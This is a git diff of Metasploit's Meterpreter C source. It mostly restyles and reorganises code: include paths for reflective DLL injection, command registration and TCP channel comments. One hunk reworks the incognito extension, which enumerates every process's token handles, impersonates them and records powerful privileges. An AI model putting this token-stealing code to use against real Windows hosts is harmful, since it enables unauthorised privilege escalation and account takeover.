strncat(impersonation_tokens, "No tokens available\n", BUF_SIZE-strlen(impersonation_tokens)-1);
{
strncat(impersonation_tokens, "No tokens available\n", BUF_SIZE - strlen(impersonation_tokens) - 1);
}
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION, delegation_tokens);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION, impersonation_tokens);
packet_transmit_response(ERROR_SUCCESS, remote, response);

1
c/meterpreter/source/extensions/incognito/incognito.h
View File

@ -5,7 +5,6 @@
#define TLV_TYPE_EXTENSION_INCOGNITO 0
#define TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION \
MAKE_CUSTOM_TLV( \
TLV_META_TYPE_STRING, \

398
c/meterpreter/source/extensions/incognito/list_tokens.c
View File

@ -1,31 +1,23 @@
#define _CRT_SECURE_NO_DEPRECATE 1
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <aclapi.h>
#include <accctrl.h>
#include <psapi.h>
#include <tlhelp32.h>
#include <lm.h>
#include <wchar.h>
#include "../../common/common.h"
#include "list_tokens.h"
#include "token_info.h"
#include "incognito.h"
typedef LONG NTSTATUS;
typedef VOID *POBJECT;
typedef enum _OBJECT_INFORMATION_CLASS{
ObjectBasicInformation,
ObjectNameInformation,
ObjectTypeInformation,
ObjectAllTypesInformation,
ObjectHandleInformation
typedef enum _OBJECT_INFORMATION_CLASS
{
ObjectBasicInformation,
ObjectNameInformation,
ObjectTypeInformation,
ObjectAllTypesInformation,
ObjectHandleInformation
} OBJECT_INFORMATION_CLASS;
typedef struct _SYSTEM_HANDLE {
typedef struct _SYSTEM_HANDLE
{
ULONG uIdProcess;
UCHAR ObjectType;
UCHAR Flags;
@ -34,12 +26,14 @@ typedef struct _SYSTEM_HANDLE {
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION {
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG uCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_PROCESS_INFORMATION {
typedef struct _SYSTEM_PROCESS_INFORMATION
{
ULONG NextEntryOffset;
BYTE Reserved1[52];
PVOID Reserved2[3];
@ -53,7 +47,8 @@ typedef struct _SYSTEM_PROCESS_INFORMATION {
LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef struct _UNICODE_STRING {
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
@ -111,44 +106,55 @@ static int compare_token_names(const unique_user_token *a, const unique_user_tok
SavedToken *get_token_list(DWORD *num_tokens_enum, TOKEN_PRIVS *token_privs)
{
DWORD total=0, i, j, num_tokens=0, token_list_size = BUF_SIZE, dwSize = sizeof(SYSTEM_HANDLE_INFORMATION), dwError;
DWORD total = 0, i, j, num_tokens = 0, token_list_size = BUF_SIZE, dwSize = sizeof(SYSTEM_HANDLE_INFORMATION);
HANDLE process, hObject;
PSYSTEM_PROCESS_INFORMATION pProcessInfo=NULL;
PSYSTEM_PROCESS_INFORMATION original_pProcessInfo=NULL;
PSYSTEM_PROCESS_INFORMATION pProcessInfo = NULL;
PSYSTEM_PROCESS_INFORMATION original_pProcessInfo = NULL;
NTSTATUS ntReturn;
BOOL bMoreProcesses = TRUE;
LPVOID TokenPrivilegesInfo[BUF_SIZE];
DWORD returned_privileges_length, returned_name_length;
char privilege_name[BUF_SIZE];
HANDLE hObject2=NULL;
HANDLE hObject2 = NULL;
SavedToken *token_list = (SavedToken*)calloc(token_list_size, sizeof(SavedToken));
SavedToken *token_list = (SavedToken*)calloc(token_list_size, sizeof(SavedToken));
*num_tokens_enum = 0;
dprintf("[INCOGNITO] Preparing for token enumeration");
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = FALSE;
token_privs->SE_CREATE_TOKEN_PRIVILEGE = FALSE;
token_privs->SE_TCB_PRIVILEGE = FALSE;
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = FALSE;
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = FALSE;
token_privs->SE_BACKUP_PRIVILEGE = FALSE;
token_privs->SE_RESTORE_PRIVILEGE = FALSE;
token_privs->SE_DEBUG_PRIVILEGE = FALSE;
token_privs->SE_IMPERSONATE_PRIVILEGE = FALSE;
token_privs->SE_IMPERSONATE_PRIVILEGE = FALSE;
token_privs->SE_RELABEL_PRIVILEGE = FALSE;
token_privs->SE_LOAD_DRIVER_PRIVILEGE = FALSE;
// Enable debug privs if possible
OpenProcessToken(GetCurrentProcess(), GENERIC_ALL/*MAXIMUM_ALLOWED*/, &hObject);
dprintf("[INCOGNITO] Opening current process token");
if (!OpenProcessToken(GetCurrentProcess(), GENERIC_ALL/*MAXIMUM_ALLOWED*/, &hObject))
{
dprintf("[INCOGNITO] Opening current process token failed with %u (%x)", GetLastError(), GetLastError());
return NULL;
}
dprintf("[INCOGNITO] Process opened");
has_impersonate_priv(hObject);
dprintf("[INCOGNITO] Grabbing function handles");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
NtQueryObject= (NTQUERYOBJECT)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryObject");
dwSize = 256*1000;
NtQueryObject = (NTQUERYOBJECT)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryObject");
dwSize = 256 * 1000;
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(dwSize);
dprintf("[INCOGNITO] Getting system information");
ntReturn = NtQuerySystemInformation(SystemProcessInformation, pProcessInfo, dwSize, &dwSize);
while (ntReturn == STATUS_INFO_LENGTH_MISMATCH) {
while (ntReturn == STATUS_INFO_LENGTH_MISMATCH)
{
dprintf("[INCOGNITO] Length mismatch, retrying ...");
free(pProcessInfo);
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(dwSize);
ntReturn = NtQuerySystemInformation(SystemProcessInformation, pProcessInfo, dwSize, &dwSize);
@ -156,93 +162,108 @@ SavedToken *get_token_list(DWORD *num_tokens_enum, TOKEN_PRIVS *token_privs)
original_pProcessInfo = pProcessInfo;
if(ntReturn == STATUS_SUCCESS)
if (ntReturn == STATUS_SUCCESS)
{
while (bMoreProcesses)
{
dprintf("[INCOGNITO] Looking good, continuing processing...");
while (bMoreProcesses)
{
dprintf("[INCOGNITO] NextEntryoffset: %u", pProcessInfo->NextEntryOffset);
if (pProcessInfo->NextEntryOffset == 0)
{
bMoreProcesses = FALSE;
}
// if has impersonate privs, only needs read access
process = OpenProcess(MAXIMUM_ALLOWED,FALSE, (DWORD)pProcessInfo->UniqueProcessId);
for(i = 0; i < pProcessInfo->HandleCount; i++)
{
if(process != INVALID_HANDLE_VALUE)
dprintf("[INCOGNITO] Looking good, continuing processing...");
process = OpenProcess(MAXIMUM_ALLOWED, FALSE, (DWORD)pProcessInfo->UniqueProcessId);
if (process == NULL)
{
dprintf("[INCOGNITO] Failed to open process %u (%x)", (DWORD)pProcessInfo->UniqueProcessId, (DWORD)pProcessInfo->UniqueProcessId);
}
else
{
dprintf("[INCOGNITO] Iterating %u processes for %u (%x)", pProcessInfo->HandleCount, (DWORD)pProcessInfo->UniqueProcessId, (DWORD)pProcessInfo->UniqueProcessId);
for (i = 0; i < pProcessInfo->HandleCount; i++)
{
hObject = NULL;
if(DuplicateHandle(process, (HANDLE)((i+1)*4),
GetCurrentProcess(), &hObject, MAXIMUM_ALLOWED, FALSE, 0x02) != FALSE)
if (DuplicateHandle(process, (HANDLE)((i + 1) * 4),
GetCurrentProcess(), &hObject, MAXIMUM_ALLOWED, FALSE, 0x02) != FALSE)
{
LPWSTR lpwsType=NULL;
lpwsType = GetObjectInfo(hObject, ObjectTypeInformation);
if ((lpwsType!=NULL) && !wcscmp(lpwsType, L"Token") && ImpersonateLoggedOnUser(hObject) != 0)
LPWSTR lpwsType = NULL;
lpwsType = GetObjectInfo(hObject, ObjectTypeInformation);
if ((lpwsType != NULL) && !wcscmp(lpwsType, L"Token") && ImpersonateLoggedOnUser(hObject) != 0)
{
// ImpersonateLoggedOnUser() always returns true. Need to check whether impersonated token kept impersonate status - failure degrades to identification
// also revert to self after getting new token context
// only process if it was impersonation or higher
OpenThreadToken(GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hObject2);
RevertToSelf();
if (is_impersonation_token(hObject2) )
if (is_impersonation_token(hObject2))
{
// Reallocate space if necessary
if(*num_tokens_enum >= token_list_size)
if (*num_tokens_enum >= token_list_size)
{
token_list_size *= 2;
token_list = (SavedToken*)realloc(token_list, token_list_size*sizeof(SavedToken));
if (!token_list)
{
goto cleanup;
}
}
token_list[*num_tokens_enum].token = hObject;
get_domain_username_from_token(hObject, token_list[*num_tokens_enum].username);
if (GetTokenInformation(hObject, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
if (((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount > 0)
for (j=0;j<((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount;j++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[j].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
for (j = 0; j < ((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount; j++)
{
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeCreateTokenPrivilege") == 0)
{
token_privs->SE_CREATE_TOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTcbPrivilege") == 0)
{
token_privs->SE_TCB_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTakeOwnershipPrivilege") == 0)
{
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeBackupPrivilege") == 0)
{
token_privs->SE_BACKUP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRestorePrivilege") == 0)
{
token_privs->SE_RESTORE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeDebugPrivilege") == 0)
{
token_privs->SE_DEBUG_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
{
token_privs->SE_IMPERSONATE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRelabelPrivilege") == 0)
{
token_privs->SE_RELABEL_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeLoadDriverPrivilege") == 0)
{
token_privs->SE_LOAD_DRIVER_PRIVILEGE = TRUE;
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[j].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
{
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeCreateTokenPrivilege") == 0)
{
token_privs->SE_CREATE_TOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTcbPrivilege") == 0)
{
token_privs->SE_TCB_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTakeOwnershipPrivilege") == 0)
{
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeBackupPrivilege") == 0)
{
token_privs->SE_BACKUP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRestorePrivilege") == 0)
{
token_privs->SE_RESTORE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeDebugPrivilege") == 0)
{
token_privs->SE_DEBUG_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
{
token_privs->SE_IMPERSONATE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRelabelPrivilege") == 0)
{
token_privs->SE_RELABEL_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeLoadDriverPrivilege") == 0)
{
token_privs->SE_LOAD_DRIVER_PRIVILEGE = TRUE;
}
}
}
}
@ -252,102 +273,111 @@ SavedToken *get_token_list(DWORD *num_tokens_enum, TOKEN_PRIVS *token_privs)
CloseHandle(hObject2);
}
else
CloseHandle(hObject);
}
}
}
// Also process primary
// if has impersonate privs, only needs read access
process = OpenProcess(MAXIMUM_ALLOWED, FALSE, (DWORD)pProcessInfo->UniqueProcessId);
dwError = OpenProcessToken(process, MAXIMUM_ALLOWED, &hObject);
if (dwError !=0 && ImpersonateLoggedOnUser(hObject) != 0)
{
// ImpersonateLoggedOnUser() always returns true. Need to check whether impersonated token kept impersonate status - failure degrades to identification
// also revert to self after getting new token context
// only process if it was impersonation or higher
OpenThreadToken(GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hObject2);
RevertToSelf();
if (is_impersonation_token(hObject2))
{
token_list[*num_tokens_enum].token = hObject;
get_domain_username_from_token(hObject, token_list[*num_tokens_enum].username);
(*num_tokens_enum)++;
if (GetTokenInformation(hObject, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
for (i=0;i<((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount;i++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[i].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
{
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeCreateTokenPrivilege") == 0)
{
token_privs->SE_CREATE_TOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTcbPrivilege") == 0)
{
token_privs->SE_TCB_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTakeOwnershipPrivilege") == 0)
{
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeBackupPrivilege") == 0)
{
token_privs->SE_BACKUP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRestorePrivilege") == 0)
{
token_privs->SE_RESTORE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeDebugPrivilege") == 0)
{
token_privs->SE_DEBUG_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
{
token_privs->SE_IMPERSONATE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRelabelPrivilege") == 0)
{
token_privs->SE_RELABEL_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeLoadDriverPrivilege") == 0)
{
token_privs->SE_LOAD_DRIVER_PRIVILEGE = TRUE;
}
CloseHandle(hObject);
}
}
}
CloseHandle(hObject2);
// Also process primary
// if has impersonate privs, only needs read access
if (OpenProcessToken(process, MAXIMUM_ALLOWED, &hObject) && ImpersonateLoggedOnUser(hObject))
{
// ImpersonateLoggedOnUser() always returns true. Need to check whether impersonated token kept impersonate status - failure degrades to identification
// also revert to self after getting new token context
// only process if it was impersonation or higher
if (OpenThreadToken(GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hObject2))
{
RevertToSelf();
if (is_impersonation_token(hObject2))
{
token_list[*num_tokens_enum].token = hObject;
get_domain_username_from_token(hObject, token_list[*num_tokens_enum].username);
(*num_tokens_enum)++;
if (GetTokenInformation(hObject, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
for (i = 0; i < ((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount; i++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[i].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
{
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeCreateTokenPrivilege") == 0)
{
token_privs->SE_CREATE_TOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTcbPrivilege") == 0)
{
token_privs->SE_TCB_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTakeOwnershipPrivilege") == 0)
{
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeBackupPrivilege") == 0)
{
token_privs->SE_BACKUP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRestorePrivilege") == 0)
{
token_privs->SE_RESTORE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeDebugPrivilege") == 0)
{
token_privs->SE_DEBUG_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
{
token_privs->SE_IMPERSONATE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRelabelPrivilege") == 0)
{
token_privs->SE_RELABEL_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeLoadDriverPrivilege") == 0)
{
token_privs->SE_LOAD_DRIVER_PRIVILEGE = TRUE;
}
}
}
}
CloseHandle(hObject2);
}
}
else
{
dprintf("[INCOGNITO] Failed next level impersonation with %u (%x)", GetLastError(), GetLastError());
}
}
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pProcessInfo + (ULONG)pProcessInfo->NextEntryOffset);
}
dprintf("[INCOGNITO] Moving to next process from %p", pProcessInfo);
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)pProcessInfo + (ULONG_PTR)pProcessInfo->NextEntryOffset);
dprintf("[INCOGNITO] Process now %p", pProcessInfo);
}
}
cleanup:
free(original_pProcessInfo);
dprintf("[INCOGNITO] Done with getting token list");
return token_list;
}
void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num_tokens, TOKEN_ORDER token_order)
{
DWORD i, j, num_groups=0;
DWORD i, j, num_groups = 0;
char *full_name, **group_name_array = NULL;
BOOL user_exists = FALSE;
// If token is NULL then return
if (!token)
{
return;
}
// Get token user or groups
if (token_order == BY_USER)
@ -355,25 +385,33 @@ void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num
full_name = calloc(BUF_SIZE, sizeof(char));
num_groups = 1;
if (!get_domain_username_from_token(token, full_name))
{
goto cleanup;
}
}
else if (token_order == BY_GROUP)
if (!get_domain_groups_from_token(token, &group_name_array, &num_groups))
goto cleanup;
for (i=0;i<num_groups;i++)
else if (token_order == BY_GROUP
&& !get_domain_groups_from_token(token, &group_name_array, &num_groups))
{
goto cleanup;
}
for (i = 0; i < num_groups; i++)
{
if (token_order == BY_GROUP)
{
full_name = (char*)group_name_array[i];
}
// Check
if (!_stricmp("None", strchr(full_name, '\\') + 1) || !_stricmp("Everyone", strchr(full_name, '\\') + 1)
|| !_stricmp("LOCAL", strchr(full_name, '\\') + 1) || !_stricmp("NULL SID", strchr(full_name, '\\') + 1)
|| !_stricmp("CONSOLE LOGON", strchr(full_name, '\\') + 1))
{
continue;
}
// Check to see if username has been seen before
for (j=0;j<*num_tokens;j++)
for (j = 0; j < *num_tokens; j++)
{
// If found then increment the number and set delegation flag if appropriate
if (!_stricmp(uniq_tokens[j].username, full_name))
@ -381,9 +419,13 @@ void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num
uniq_tokens[j].token_num++;
user_exists = TRUE;
if (is_delegation_token(token))
{
uniq_tokens[j].delegation_available = TRUE;
}
if (is_impersonation_token(token))
{
uniq_tokens[j].impersonation_available = TRUE;
}
break;
}
}
@ -397,24 +439,36 @@ void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num
uniq_tokens[*num_tokens].impersonation_available = FALSE;
if (is_delegation_token(token))
{
uniq_tokens[*num_tokens].delegation_available = TRUE;
}
if (is_impersonation_token(token))
{
uniq_tokens[*num_tokens].impersonation_available = TRUE;
}
(*num_tokens)++;
}
else
{
user_exists = FALSE;
}
// Cleanup
if (token_order == BY_GROUP && group_name_array[i])
{
free(group_name_array[i]);
}
}
// Cleanup
cleanup:
if (token_order == BY_GROUP && group_name_array)
{
free(group_name_array);
}
else if (token_order == BY_USER && full_name)
{
free(full_name);
}
}

4
c/meterpreter/source/extensions/lanattacks/lanattacks.c
View File

@ -3,11 +3,11 @@
*/
#define _CRT_SECURE_NO_DEPRECATE 1
#include "../../common/common.h"
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include <windows.h>
#include "lanattacks.h"

4
c/meterpreter/source/extensions/mimikatz/main.cpp
View File

@ -16,11 +16,11 @@ std::wstring s2ws(const std::string& str)
extern "C"
{
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();

29
c/meterpreter/source/extensions/networkpug/networkpug.c
View File

@ -430,19 +430,9 @@ DWORD request_networkpug_stop(Remote *remote, Packet *packet)
Command customCommands[] =
{
{ "networkpug_start",
{ request_networkpug_start, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "networkpug_stop",
{ request_networkpug_stop, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
}
COMMAND_REQ("networkpug_start", request_networkpug_start),
COMMAND_REQ("networkpug_stop", request_networkpug_stop),
COMMAND_TERMINATOR
};
/*
@ -450,7 +440,6 @@ Command customCommands[] =
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
DWORD index;
int peername_len;
struct sockaddr peername;
struct sockaddr_in *peername4;
@ -498,10 +487,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
dprintf("so our filter is '%s'", packet_filter);
for (index = 0;
customCommands[index].method;
index++)
command_register(&customCommands[index]);
command_register_all(customCommands);
pug_lock = lock_create();
@ -513,12 +499,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
int index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
command_deregister_all(customCommands);
free(packet_filter);

2
c/meterpreter/source/extensions/priv/server/elevate/tokendup.c
View File

@ -1,6 +1,6 @@
#include "precomp.h"
#include "tokendup.h"
#include "../../../../ReflectiveDLLInjection/LoadLibraryR.h"
#include "../../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
/*
* Enable or disable a privilege in our processes current token.

6
c/meterpreter/source/extensions/priv/server/precomp.h
View File

@ -7,9 +7,9 @@
#include "passwd.h"
#include "fs.h"
#include "../../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../../ReflectiveDLLInjection/GetProcAddressR.h"
#include "../../../ReflectiveDLLInjection/ReflectiveLoader.h"
#include "../../../DelayLoadMetSrv/DelayLoadMetSrv.h"
#include "../../../ReflectiveDLLInjection/inject/src/GetProcAddressR.h"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h"
#define strcasecmp stricmp

2
c/meterpreter/source/extensions/priv/server/priv.c
View File

@ -6,7 +6,7 @@
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();

6
c/meterpreter/source/extensions/sniffer/precomp.h
View File

@ -7,9 +7,9 @@
#ifdef _WIN32
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../ReflectiveDLLInjection/GetProcAddressR.h"
#include "../../ReflectiveDLLInjection/ReflectiveLoader.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
#include "../../ReflectiveDLLInjection/inject/src/GetProcAddressR.h"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h"
// declared in ReflectiveLoader.c and set by DllMain also in ReflectiveLoader.c
extern HINSTANCE hAppInstance;

503
c/meterpreter/source/extensions/sniffer/sniffer.c
View File

File diff suppressed because it is too large Load Diff

335
c/meterpreter/source/extensions/stdapi/server/net/socket/tcp.c
View File

@ -1,86 +1,107 @@
/*!
* @file tcp.c
* @brief Definitions for functionality that handles TCP client operations.
*/
#include "precomp.h"
#include "tcp.h"
/*********************************
* TCP Client Channel Operations *
*********************************/
/*
* Writes data from the remote half of the channel to the established connection.
/*!
* @brief Writes data from the remote half of the channel to the established connection.
* @param channel Pointer to the channel to write to.
* @param request Pointer to the request packet.
* @param context Pointer to the channel's context.
* @param buffer Buffer containing the data to write to the channel.
* @param bufferSize Size of the buffer indicating how many bytes to write.
* @param bytesWritten Pointer that receives the number of bytes written to the \c channel.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS writing the data completed successfully.
*/
DWORD tcp_channel_client_write( Channel *channel, Packet *request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten)
DWORD tcp_channel_client_write(Channel *channel, Packet *request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten)
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwResult = ERROR_SUCCESS;
TcpClientContext * ctx = NULL;
LONG written = 0;
LONG written = 0;
do
{
dprintf( "[TCP] tcp_channel_client_write. channel=0x%08X, buffsize=%d", channel, bufferSize );
dprintf("[TCP] tcp_channel_client_write. channel=0x%08X, buffsize=%d", channel, bufferSize);
ctx = (TcpClientContext *)context;
if( !ctx )
BREAK_WITH_ERROR( "[TCP] tcp_channel_client_write. ctx == NULL", ERROR_INVALID_HANDLE );
if (!ctx)
{
BREAK_WITH_ERROR("[TCP] tcp_channel_client_write. ctx == NULL", ERROR_INVALID_HANDLE);
}
written = send( ctx->fd, buffer, bufferSize, 0 );
written = send(ctx->fd, buffer, bufferSize, 0);
if( written == SOCKET_ERROR )
if (written == SOCKET_ERROR)
{
dwResult = WSAGetLastError();
if( dwResult == WSAEWOULDBLOCK )
if (dwResult == WSAEWOULDBLOCK)
{
struct timeval tv = {0};
fd_set set = {0};
DWORD res = 0;
struct timeval tv = { 0 };
fd_set set = { 0 };
DWORD res = 0;
dprintf( "[TCP] tcp_channel_client_write. send returned WSAEWOULDBLOCK, waiting until we can send again..." );
dprintf("[TCP] tcp_channel_client_write. send returned WSAEWOULDBLOCK, waiting until we can send again...");
while( TRUE )
while (TRUE)
{
tv.tv_sec = 0;
tv.tv_sec = 0;
tv.tv_usec = 1000;
FD_ZERO( &set );
FD_SET( ctx->fd, &set );
FD_ZERO(&set);
FD_SET(ctx->fd, &set);
res = select( 0, NULL, &set, NULL, &tv );
if( res > 0 )
res = select(0, NULL, &set, NULL, &tv);
if (res > 0)
{
dwResult = ERROR_SUCCESS;
break;
}
else if( res == SOCKET_ERROR )
else if (res == SOCKET_ERROR)
{
dwResult = WSAGetLastError();
break;
}
Sleep( 100 );
Sleep(100);
}
if( dwResult == ERROR_SUCCESS )
if (dwResult == ERROR_SUCCESS)
{
continue;
}
else
dprintf( "[TCP] tcp_channel_client_write. select == SOCKET_ERROR. dwResult=%d", dwResult );
{
dprintf("[TCP] tcp_channel_client_write. select == SOCKET_ERROR. dwResult=%d", dwResult);
}
}
written = 0;
dprintf( "[TCP] tcp_channel_client_write. written == SOCKET_ERROR. dwResult=%d", dwResult );
dprintf("[TCP] tcp_channel_client_write. written == SOCKET_ERROR. dwResult=%d", dwResult);
}
if( bytesWritten )
if (bytesWritten)
{
*bytesWritten = written;
}
} while( 0 );
} while (0);
dprintf( "[TCP] tcp_channel_client_write. finished. dwResult=%d, written=%d", dwResult, written );
dprintf("[TCP] tcp_channel_client_write. finished. dwResult=%d, written=%d", dwResult, written);
return dwResult;
}
/*
* Closes the established connection and cleans up stale state
/*!
* @brief Closes the established connection and cleans up stale state.
* @param channel Pointer to the channel to be closed.
* @param request Pointer to the request packet.
* @param context Pointer to the channel's context.
* @returns indication of success or failure.
* @retval ERROR_SUCCESS the channel was closed successfully.
*/
DWORD tcp_channel_client_close(Channel *channel, Packet *request, LPVOID context)
{
